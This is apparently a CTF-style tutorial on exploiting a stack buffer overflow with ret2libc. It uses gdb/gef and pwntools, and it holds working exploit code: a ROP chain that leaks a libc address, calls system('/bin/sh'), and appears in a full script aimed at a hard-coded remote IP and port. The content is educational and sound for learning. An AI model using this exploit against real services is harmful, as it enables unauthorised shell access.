pwn> ret2libc by example

How to perform the attack against a binary whose libraries are loaded at randomized addresses in memory - ret2libc & pwntools by example.

NOTICE I’m not very experienced in “offensive RE” ~> pwns. If you find any mistakes in my explanations, please let me know in the comments :)

Prerequisites

exploitable (linux) binary
python3 + pwntools (I’m using it in virtualenv)
GDB + gef

# quick install
sudo apt install gdb python3 python3-pip

# install gef (https://github.com/hugsy/gef)
wget -O ~/.gdbinit-gef.py -q http://gef.blah.cat/py
echo source ~/.gdbinit-gef.py >> ~/.gdbinit

# install pwntools in virtualenv (https://docs.pwntools.com/en/stable/)
pip install virtualenv
virtualenv -p python3 venv
. ./venv/bin/activate
pip install pwntools

My exploitable binary has the following properties:

gef➤  checksec
[+] checksec for 'binary'
Canary                        : ✘
NX                            : ✓
PIE                           : ✘
Fortify                       : ✘
RelRO                         : Full

Hunt for the exploitable code

This tutorial focuses only on binaries whose libraries are loaded at randomized addresses (ASLR); it ignores PIE and stack canaries entirely.

The easiest way to find the exploitable code is to play with the binary and learn about its background. Exploitable functionality is usually triggered wherever the binary interacts with the user (receiving & parsing packets, user input, configs).

In my case the binary has only 4 “input fields” and only one of them allows writing past the end of the allocated buffer:

// ida pseudo-code:
int fill()
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  memset(buf, 0, sizeof(buf));
  printf("How much data do you want to store?\n> ");
  read(0, buf, 0x400uLL);                       // buffer can be overwritten
  return printf("\nEnjoy your %s", buf);
}

buf can hold only 32 bytes, but read accepts up to 0x400 (1024) bytes, so we should be able to fill the buffer completely and overwrite the return address. The stack looks like this:

+----------------+
|  return addr   |   <- return address saved when call fill was executed
+----------------+
|   stored_rbp   |   <- saved RBP
+----------------+
|                |
|     buffer     |   <- local variables
|                |
+----------------+
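The diagram translates into simple arithmetic. Here is a minimal sketch in plain Python; the constant names are my own, the sizes come from the pseudo-code above, and I am assuming a standard x86-64 frame with no padding between buf and the saved RBP:

```python
import struct

BUF_SIZE = 32        # char buf[32], located at rbp-0x20
SAVED_RBP_SIZE = 8   # one 64-bit register pushed by the function prologue

# Number of bytes to write before reaching the saved return address.
offset_to_ret = BUF_SIZE + SAVED_RBP_SIZE

# Placeholder return address, only to show where it lands in the input.
fake_ret = struct.pack("<Q", 0xdeadbeef)
payload = b"A" * offset_to_ret + fake_ret

print(offset_to_ret)   # 40
print(len(payload))    # 48
```

The whole payload is far below the 0x400 bytes that read accepts, so nothing gets truncated.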

Protip

The ASM instruction call <func> is equivalent to two operations: push the address of the next instruction, then jmp <func>. It saves the return address on the stack and jumps to the called function.

ret is analogous: it pops the saved address from the stack and jumps to it.
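A toy model of that behaviour, written in plain Python, may help. It is only an illustration: the caller address is made up, 0x400e4a is the start of fill() (0x400eec is fill+162 in the gdb output later in this article), and 0x400650 is puts@plt taken from the objdump output further down.

```python
stack = []                 # top of the stack is the end of the list

def call(next_instruction_addr, target):
    """Model of call: push the return address, then jump to target."""
    stack.append(next_instruction_addr)
    return target          # new rip

def ret():
    """Model of ret: pop an address from the stack and jump to it."""
    return stack.pop()     # new rip

rip = call(0x400f00, 0x400e4a)   # hypothetical caller address, start of fill()
stack[-1] = 0x400650             # the overflow replaces the saved address
rip = ret()
print(hex(rip))                  # 0x400650
```

Whoever controls the value on top of the stack at the moment of ret controls where execution continues.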

Prove that you are in control

The next natural step is to verify that we can actually control the rip register. The easiest way to do that is to run the binary in gdb with gef installed and generate a pattern:

gef➤  pattern create 60
[+] Generating a pattern of 60 bytes
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa
[+] Saved as '$_gef0'

Protip

The generated pattern uses readable characters, and every sufficiently long substring (8 characters here) occurs in it only once, so the offset of any such substring can be identified easily.

Then use the generated pattern as input to the potentially vulnerable functionality. In my case I had to navigate to the proper menu and paste the pattern as the choice option. As a result the program crashed and gdb caught the signal:
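To make the uniqueness property concrete, here is a sketch of a de Bruijn sequence generator in plain Python. It is not gef's own code; I am assuming a lowercase alphabet and 8-character windows, which gives the same 60 characters as the gef output above.

```python
from itertools import islice

def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence: every n-character window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

pattern = "".join(islice(de_bruijn("abcdefghijklmnopqrstuvwxyz", 8), 60))
windows = [pattern[i:i + 8] for i in range(len(pattern) - 7)]

print(pattern)
print(len(windows) == len(set(windows)))  # True: no window repeats
```

Because no 8-character window repeats, the 8 bytes that end up in a register identify exactly one position in the input.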

> aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa

Enjoy your aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa

Program received signal SIGSEGV, Segmentation fault.
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x49
$rbx   : 0x0
$rcx   : 0x0
$rdx   : 0x00007ffff7dd18c0  →  0x0000000000000000
$rsp   : 0x00007fffffffe278  →  "faaaaaaagaaaaaaahaaa\n"
$rbp   : 0x6161616161616165 ("eaaaaaaa"?)
$rsi   : 0x00007fffffffbbb0  →  "Enjoy your aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaa"
$rdi   : 0x1
$rip   : 0x0000000000400eec  →  <fill+162> ret
$r8    : 0x49
$r9    : 0x3d
$r10   : 0xffffffc3
$r11   : 0x246
$r12   : 0x00000000004006e0  →  <_start+0> xor ebp, ebp
$r13   : 0x00007fffffffe370  →  0x0000000000000001
$r14   : 0x0
$r15   : 0x0
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffe278│+0x0000: "faaaaaaagaaaaaaahaaa\n"     ← $rsp
0x00007fffffffe280│+0x0008: "gaaaaaaahaaa\n"
0x00007fffffffe288│+0x0010: 0x0000000a61616168 ("haaa\n"?)
0x00007fffffffe290│+0x0018: 0x0000000000401040  →  <__libc_csu_init+0> push r15
0x00007fffffffe298│+0x0020: 0x00007ffff7a05b97  →  <__libc_start_main+231> mov edi, eax
0x00007fffffffe2a0│+0x0028: 0x0000000000000001
0x00007fffffffe2a8│+0x0030: 0x00007fffffffe378  →  0x00007fffffffe5eb  →  "/tmp/binary"
0x00007fffffffe2b0│+0x0038: 0x0000000100008000
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x400ee5 <fill+155>       call   0x400670 <printf@plt>
     0x400eea <fill+160>       nop
     0x400eeb <fill+161>       leave
 →   0x400eec <fill+162>       ret
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "binary", stopped 0x400eec in fill (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x400eec → fill()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x0000000000400eec in fill ()

Bingo! The program crashed because it tried to return to an invalid address. Now you can find the offset of the bytes that overwrote the return address:

gef➤  pattern offset $rsp
[+] Searching '$rsp'
[+] Found at offset 40 (little-endian search) likely
[+] Found at offset 33 (big-endian search)

Protip

We can find the address in rsp because the processor failed to execute the ret instruction: the overwritten return address is still on top of the stack, and rip still points to the faulting ret.

Protip

As the argument for pattern offset you can also provide a string or a hex number:

gef➤  pattern offset faaaaaaagaaaaaaahaa
[+] Searching 'faaaaaaagaaaaaaahaa'
[+] Found at offset 40 (big-endian search)

gef➤  pattern offset 0x6161616161616166
[+] Searching '0x6161616161616166'
[+] Found at offset 40 (little-endian search) likely
[+] Found at offset 33 (big-endian search)

Save the found offset (40 in my case), we will need it later.
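The lookup that pattern offset performs can be reproduced by hand. This is a minimal sketch in plain Python (the helper name offset_of is my own), using the pattern and the register values from the gdb session above:

```python
import struct

# Pattern generated by gef in the session above.
pattern = b"aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa"

def offset_of(value):
    """Offset of a 64-bit register value inside the pattern (-1 if absent)."""
    return pattern.find(struct.pack("<Q", value))   # little-endian bytes

print(offset_of(0x6161616161616166))  # 40 -> first qword at rsp (return address)
print(offset_of(0x6161616161616165))  # 32 -> value that ended up in rbp
```

The two results agree with the stack layout: 32 bytes of buffer, then the saved RBP at offset 32, then the return address at offset 40.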

Develop the exploit (ret2libc)

The ret2libc attack consists of several simple steps:

Leak the address of a libc function
Calculate the address of libc in memory
Redirect the execution flow to a libc function such as system to execute /bin/sh

Notice!

All steps need to be performed during a single program execution (due to the randomization). For this you need either 2 vulnerable functions or to call the vulnerable code twice ;)

PWNtools: quick start

We are going to start by loading the binaries (binary and libc) into pwntools:

import pwn

p = pwn.process('./binary')
#p = pwn.remote("138.68.182.108", 30784)

pwn.context(os='linux', arch='amd64')
#pwn.context.log_level = 'debug'

elf = pwn.ELF("./binary")
libc = pwn.ELF("./libc.so.6")

Protip

If you want to run the exploit against a remote target, uncomment pwn.remote (& comment out pwn.process); for debug logs uncomment pwn.context.log_level = 'debug'.

Now we can easily use the binaries’ meta information such as stored symbols, etc.

It might happen that the vulnerable code is hidden behind some menus; to navigate through the program you can use several functions:

p.recvuntil(b"> ") # receive stdout until this substring
p.recv(0xff)       # receive up to n bytes
p.recvline()       # receive stdout until new line

p.send(b'foo')     # send bytes
p.sendline(b'foo') # send 'foo\n' (with new line character)

# optionally use the timeout parameter to wait for output
p.recv(0xff, timeout=0.5)

Leak address

So, now you have managed to load the binary, execute it and navigate to the vulnerable functionality.

Now it’s time to create the payload - the easiest way to do it is to use the ROP module.

The code below does the following:

Fills the buffer (32 bytes)
Overwrites the saved base pointer on the stack (8 bytes)
Calls puts to leak the address of puts stored in the GOT
Redirects the execution flow back to the same vulnerable function (fill in my case)
Joins the fill bytes with the ROP chain
Sends the payload

fill = b'A' * 40
rop = pwn.ROP(elf)
rop.call(elf.plt["puts"], [elf.got["puts"]])
rop.call(elf.symbols["fill"])
payload = b"".join([fill, rop.chain()])
p.sendline(payload)

Under the hood of rop.call

Different architectures call functions using specific calling conventions¹. For example on Linux x86-64 the 1st argument of a function is always passed in the rdi register. If we want to call a function with an argument, we need to make sure that the argument value is stored in that register.

For that we create a ROP chain which will:

Jump to code containing an instruction that takes the argument from the stack and places it in rdi (pop rdi).

Take the address to jump to from the stack and jump to it (ret).

In general the rop.call chain will look like this: <pop rdi; ret addr> <arg> <func_addr> (pwntools is capable of finding the gadgets needed to call the function with all its arguments).
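To see what such a chain looks like as raw bytes, here is a hand-built version in plain Python. It is only a sketch: the pop rdi; ret gadget address is hypothetical (pwntools looks up the real one for you), the puts addresses are the ones from the objdump output in this article, and the address of fill is derived from fill+162 = 0x400eec in the gdb output.

```python
import struct

def p64(value):
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)

POP_RDI_RET = 0x4010a3   # hypothetical gadget address, find the real one in your binary
PUTS_PLT    = 0x400650   # puts@plt, from the objdump output in this article
PUTS_GOT    = 0x601fa8   # GOT entry of puts, from the same output
FILL        = 0x400e4a   # start of fill(): 0x400eec (fill+162) minus 162

chain = b"".join([
    p64(POP_RDI_RET),    # ret jumps here; pop rdi loads the next qword
    p64(PUTS_GOT),       # becomes rdi, the 1st argument
    p64(PUTS_PLT),       # the gadget's ret jumps to puts(rdi)
    p64(FILL),           # puts returns into fill() for the second round
])
payload = b"A" * 40 + chain
print(payload[40:].hex())
```

Each entry is 8 bytes, so this two-call chain adds 32 bytes after the 40 bytes of fill.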

PLT vs GOT²

PLT - Procedure Linkage Table, contains stubs that jump to the target

GOT - Global Offset Table, a table of the target addresses (resolved at runtime)

You can find these values yourself:
$ objdump -D ./binary| grep puts
0000000000400650 <puts@plt>:
  400650:       ff 25 52 19 20 00       jmpq   *0x201952(%rip)        # 601fa8 <puts@GLIBC_2.2.5>
...
We can interpret the above output as:

PLT address = 0x400650

GOT entry = 0x601fa8
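The GOT address in the objdump comment is not magic; it follows from the instruction bytes. A small sketch in plain Python, using only the values printed above:

```python
insn_addr = 0x400650      # address of the jmpq in puts@plt
insn_len = 6              # ff 25 52 19 20 00
displacement = int.from_bytes(bytes.fromhex("52192000"), "little")

# rip-relative operands are relative to the address of the NEXT instruction.
got_entry = insn_addr + insn_len + displacement
print(hex(displacement))  # 0x201952
print(hex(got_entry))     # 0x601fa8
```

In the exploit you do not need to do this by hand: elf.plt["puts"] and elf.got["puts"] give the same two addresses.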

After sending the prepared payload to the program, the stack should look like this:

+----------------+
|  ptr_plt_puts  |   <- pointer to puts function which will be executed
+----------------+
|  ptr_got_puts  |   <- address to entry of puts in GOT, value will be printed by puts above
+----------------+
|   ptr_poprdi   |   <- pointer to pop rdi; ret
+----------------+
|                |
|      fill      |   <- our "fill", which just overflows the buffer and saved rbp
|     (A*40)     |
|                |
+----------------+

Now we need to parse the output; this part is specific to each program. I really recommend enabling debug output, which shows the transferred data.

Protip - Enable Debug Mode
pwn.context.log_level = 'debug'

# parse leaked address
raw_data = p.recvuntil(b'\n')
raw_data = raw_data.strip()  # \
raw_data = raw_data[-6:]     # - skip unnecessary data

leaked_puts = raw_data.ljust(8, b'\x00') # fill missing bytes with zeroes
leaked_puts = pwn.u64(leaked_puts)
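The same parsing can be tried offline, without the target running. Below is a sketch in plain Python; parse_leak is my own helper name and the sample line is made up. Unlike the snippet above, it strips only the trailing newline, because a plain strip() would also remove address bytes that happen to be whitespace (0x09, 0x20, ...).

```python
def parse_leak(line):
    """Extract a 6-byte little-endian pointer from the end of an output line."""
    tail = line.rstrip(b"\n")[-6:]          # userland addresses use 6 bytes
    return int.from_bytes(tail.ljust(8, b"\x00"), "little")

# Hypothetical captured line: echoed input followed by the leaked pointer.
sample = b"A" * 40 + b"\xc0\x09\xa8\xf7\xff\x7f\n"
print(hex(parse_leak(sample)))   # 0x7ffff7a809c0
```

If the leaked address itself contains a newline byte (0x0a), recvuntil stops too early and the leak has to be repeated or read differently.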

Packing and Unpacking the bytes

pwntools contains built-in functions for packing and unpacking: they convert between ints and bytes according to the environment set with the context function (endianness is set automatically).
>>> pwn.p64(0x4142424245464748)
b'HGFEBBBA'

>>> pwn.u64(b'HEXIFYIT')
6073483730898928968
# 0x5449594649584548
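For comparison, the same conversions can be written with the standard struct module. This sketch assumes the little-endian amd64 context used in this article; the helper names simply mirror the pwntools ones.

```python
import struct

def p64(value):
    return struct.pack("<Q", value)      # int -> 8 little-endian bytes

def u64(data):
    return struct.unpack("<Q", data)[0]  # 8 little-endian bytes -> int

print(p64(0x4142424245464748))   # b'HGFEBBBA'
print(hex(u64(b"HEXIFYIT")))     # 0x5449594649584548
```

The byte order is reversed compared to how the number is written, which is why a leaked address has to be padded on the right with zero bytes before unpacking.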

Run /bin/sh

The “last” step consists of the following substeps:

Calculate the address of libc in memory
Calculate the address of system() function and its argument ("/bin/sh")
Prepare the ropchain & pass it as argument
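The first two substeps are plain arithmetic. Here is a sketch with made-up numbers (all three constants are hypothetical; the real offsets come from the libc.so.6 that the target uses):

```python
# Hypothetical values for illustration; read the real offsets from your libc.so.6.
LEAKED_PUTS   = 0x7ffff7a809c0   # runtime address printed by stage 1
PUTS_OFFSET   = 0x0809c0         # offset of puts inside libc
SYSTEM_OFFSET = 0x04f440         # offset of system inside libc

libc_base = LEAKED_PUTS - PUTS_OFFSET
system_addr = libc_base + SYSTEM_OFFSET

# Libraries are mapped on page boundaries, so a correct base ends in 000.
assert libc_base & 0xfff == 0, "wrong libc version or bad leak"
print(hex(libc_base))     # 0x7ffff7a00000
print(hex(system_addr))   # 0x7ffff7a4f440
```

The page-alignment check is a cheap sanity test: if the computed base does not end in 000, the local libc.so.6 most likely differs from the one on the target.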

Ok, but why?

You might be wondering why we don’t just call system() directly in the previous step. It seems much simpler than this whole game of calling the same function once again.

The reason is simple: there is no system plt entry in our binary, so we can’t call it:
$ objdump -D ./binary| grep 'system'
# empty output
We don’t have it in our binary, so we need to locate it in memory relative to a function whose address we can leak - in our case puts.

pwn.info("Stage 2, ret2shell")
# calculate offset, base address of the libc in the memory
libc.address = leaked_puts - libc.symbols['puts']

# prepare the final payload
rop = pwn.ROP(libc)
# extra ret to fix the padding (stack alignment) before system(), you might not need it
rop.call(rop.find_gadget(['ret']))
# search with the trailing null byte, so that we don't pick a "/bin/sh" followed by garbage like '/bin/shFEFE', which obviously doesn't exist on linux
rop.call(libc.symbols['system'], [next(libc.search(b"/bin/sh\x00"))])
payload = b"".join([fill, rop.chain()])

p.sendline(payload)
p.interactive()

The last line (p.interactive()) hands the spawned shell over to you:

$ ps
  PID TTY          TIME CMD
   26 ?        00:00:00 binary
   27 ?        00:00:00 sh
   28 ?        00:00:00 sh
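About the extra ret gadget in the final payload: as far as I understand, it is there for stack alignment. The x86-64 System V ABI expects rsp % 16 == 8 when a function starts, and some libc builds use aligned SSE instructions inside system that crash otherwise. The sketch below checks this with plain arithmetic; it assumes that the return address slot in the second pass of fill has the same alignment as the one seen in the gdb session.

```python
RET_SLOT = 0x00007fffffffe278   # rsp at the faulting ret in the gdb session above

def rsp_at_entry(qwords_before_target):
    """rsp when the target starts: each chain entry consumed moves rsp by 8."""
    return RET_SLOT + 8 * (qwords_before_target + 1)

# Chain: [pop rdi; ret] [arg] [system]            -> 2 qwords before system
# Chain: [ret] [pop rdi; ret] [arg] [system]      -> 3 qwords before system
for name, n in (("without ret", 2), ("with ret", 3)):
    rsp = rsp_at_entry(n)
    # The SysV ABI expects rsp % 16 == 8 at function entry.
    print(name, hex(rsp), "ok" if rsp % 16 == 8 else "misaligned")
```

If your exploit reaches system but the process dies with SIGSEGV before the shell appears, adding or removing one ret gadget is the first thing to try.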

Full script

import pwn

#p = pwn.process('./binary')
p = pwn.remote("138.68.182.108", 30784)

pwn.context(os='linux', arch='amd64')
#pwn.context.log_level = 'debug'

elf = pwn.ELF("./binary")
libc = pwn.ELF("./libc.so.6")

pwn.info("Stage 1, leak puts addr")
p.recvuntil(...)
p.sendline(...)
p.recv(...)

# prepare payload
fill = b'A' * 40
rop = pwn.ROP(elf)
rop.call(elf.plt["puts"], [elf.got["puts"]])
rop.call(elf.symbols["fill"])
payload = b"".join([fill, rop.chain()])

p.sendline(payload)
p.recvuntil(b"Enjoy your ")

# extract leaked puts address
raw_data = p.recvuntil(b'\n')
raw_data = raw_data.strip()  # \
raw_data = raw_data[-6:]     # - skip unnecessary data

leaked_puts = raw_data.ljust(8, b'\x00') # fill missing bytes with zeroes
leaked_puts = pwn.u64(leaked_puts)
pwn.success(f'Leaked puts: {leaked_puts:x}')


pwn.info("Stage 2, ret2shell")
# calculate offset, base address of the libc in the memory
libc.address = leaked_puts - libc.symbols['puts']

# prepare the final payload
rop = pwn.ROP(libc)
rop.call(rop.find_gadget(['ret']))
rop.call(libc.symbols['system'], [next(libc.search(b"/bin/sh\x00"))])
payload = b"".join([fill, rop.chain()])

p.sendline(payload)
pwn.success("Have fun!")
p.interactive()
